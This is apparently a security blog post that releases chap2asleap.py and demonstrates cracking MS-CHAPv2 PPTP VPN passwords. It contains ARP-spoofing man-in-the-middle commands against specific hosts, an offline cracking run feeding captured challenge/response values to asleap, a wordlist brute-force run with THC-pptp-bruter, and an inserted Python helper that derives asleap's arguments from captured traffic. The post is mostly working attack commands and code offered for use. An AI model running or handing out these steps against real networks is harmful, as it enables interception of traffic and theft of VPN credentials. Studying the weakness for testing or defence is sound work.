chap2asleap.py (v0.1.1) + Cracking VPN (Asleap + THC-pptp-bruter)

A python script, to automatically generate the arguments for Joshua Wright's 'asleap' program.

This video demonstrates an offline (asleap) and an online (THC-pptp-bruter) attack on an MSCHAPv2 software VPN.

Links

Download video: http://download.g0tmi1k.com/videos_archive/asleap___THC-pptp-bruter.mp4

Method

From Wireshark (and a Man In The Middle attack), you can get the "CHAP Challenge" and "CHAP Response". We can break these values down:

CHAP Challenge = Auth Challenge (16 bytes)

CHAP Response = Peer Challenge (16 bytes) and Peer Response (24 bytes)

After finding the "Auth Challenge" and "Peer Challenge", we append them to the username and hash (SHA1) the result. This generates the "Challenge".

Once we have the Challenge, we can feed it into asleap, along with the CHAP Challenge.

This script does all the work for you (and more); it just needs the values from Wireshark. It also offers different styles of attack: you can either use a dictionary/wordlist, or use 'genkeys' to generate a lookup file for asleap (which is recommended). It can also run asleap automatically with the generated arguments.
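The following Python is an added example, not chap2asleap.py itself: it splits the two Wireshark values into their RFC 2759 fields, derives the 8-byte Challenge exactly as the Method section describes, and prints the pair in the colon-delimited form that asleap's -C/-R options take. The sample values are the ones from the Commands section below; the function and class names are my own.

```python
import hashlib
from dataclasses import dataclass
from typing import Tuple


@dataclass
class MSChapV2Capture:
    auth_challenge: bytes   # 16 bytes: the "CHAP Challenge" value from Wireshark
    peer_challenge: bytes   # 16 bytes: first field of the "CHAP Response" value
    nt_response: bytes      # 24 bytes: the "Peer Response" (NT-Response)
    flags: int              # 1 byte: always 0 for MS-CHAPv2


def parse_capture(challenge_hex: str, response_hex: str) -> MSChapV2Capture:
    """Split the two hex strings copied from Wireshark into their RFC 2759 fields."""
    chal = bytes.fromhex(challenge_hex)
    resp = bytes.fromhex(response_hex)
    if len(chal) != 16:
        raise ValueError(f"CHAP Challenge must be 16 bytes, got {len(chal)}")
    # Response value layout: 16 peer challenge | 8 reserved (zero) | 24 NT-Response | 1 flags
    if len(resp) != 49:
        raise ValueError(f"CHAP Response must be 49 bytes, got {len(resp)}")
    peer, reserved, nt, flags = resp[:16], resp[16:24], resp[24:48], resp[48]
    if reserved != bytes(8):
        raise ValueError("reserved field is not zero; this is not an MS-CHAPv2 response")
    return MSChapV2Capture(chal, peer, nt, flags)


def challenge_hash(peer_challenge: bytes, auth_challenge: bytes, username: str) -> bytes:
    """RFC 2759 ChallengeHash(): SHA1(PeerChallenge || AuthenticatorChallenge || UserName)[:8].

    Only the user name part is hashed (no "DOMAIN\\" prefix), as RFC 2759 specifies."""
    digest = hashlib.sha1(peer_challenge + auth_challenge + username.encode("utf-8")).digest()
    return digest[:8]


def asleap_args(username: str, challenge_hex: str, response_hex: str) -> Tuple[str, str]:
    """Return (challenge, response) as colon-delimited hex, the format asleap -C/-R expect."""
    cap = parse_capture(challenge_hex, response_hex)
    chal8 = challenge_hash(cap.peer_challenge, cap.auth_challenge, username)
    colon = lambda b: ":".join(f"{x:02x}" for x in b)
    return colon(chal8), colon(cap.nt_response)


if __name__ == "__main__":
    # Sample values: the ones shown in the Commands section of this post.
    c, r = asleap_args(
        "g0tmi1k",
        "3fb0e397540e8aa3df5eb08b0053092c",
        "df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600",
    )
    print(f"asleap -C {c} -R {r}")
```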

Tools

  • asleap
  • Python
  • The script - chap2asleap.py
  • Wireshark
  • VPN
  • THC-pptp-bruter

Software

Name: asleap

Version: 2.2

Home Page: http://www.willhackforsushi.com/Asleap.html

Download Link: http://www.willhackforsushi.com/code/asleap/2.2/asleap-2.2.tgz


Name: THC-pptp-bruter

Version: 0.1.4

Home Page: http://freeworld.thc.org

Download Link: http://freeworld.thc.org/download.php?t=r&f=thc-pptp-bruter-0.1.4.tar.gz


Name: chap2asleap.py

Version: 0.1.1

Home Page: https://blog.g0tmi1k.com/

Download Link: http://github.com/g0tmi1k/

How to use chap2asleap.py

  1. chmod 755 chap2asleap.py
  2. python chap2asleap.py

Commands

# Capture setup (the Man In The Middle step described under Method)
echo 1 > /proc/sys/net/ipv4/ip_forward

arpspoof -i eth1 -t 10.0.0.3 10.0.0.9
arpspoof -i eth1 -t 10.0.0.9 10.0.0.3

wireshark -i eth1 -k

# Offline attack: feed the Wireshark values to chap2asleap.py (-x runs asleap, -v is verbose)
python chap2asleap.py
python chap2asleap.py -u g0tmi1k -c 3fb0e397540e8aa3df5eb08b0053092c -r df7661696051401f7192726630558ac200000000000000003c4b7c76ae82dd3050006c53d0bc6012db000acba0c5fec600 -x -v

# Online attack: wordlist piped into THC-pptp-bruter
cd /pentest/passwords/wordlists
cat darkc0de.lst | thc-pptp-bruter -u g0tmi1k -n 99 -l 999 10.0.0.3

Notes

Song: Two Fingers - Keman Rhythm

Video length: 03:03

Capture length: 5:48

Blog Post: https://blog.g0tmi1k.com/2010/03/chap2asleappy-v011-vpn/

Changelog

2011-04-05 - v0.2

  • [>] Updated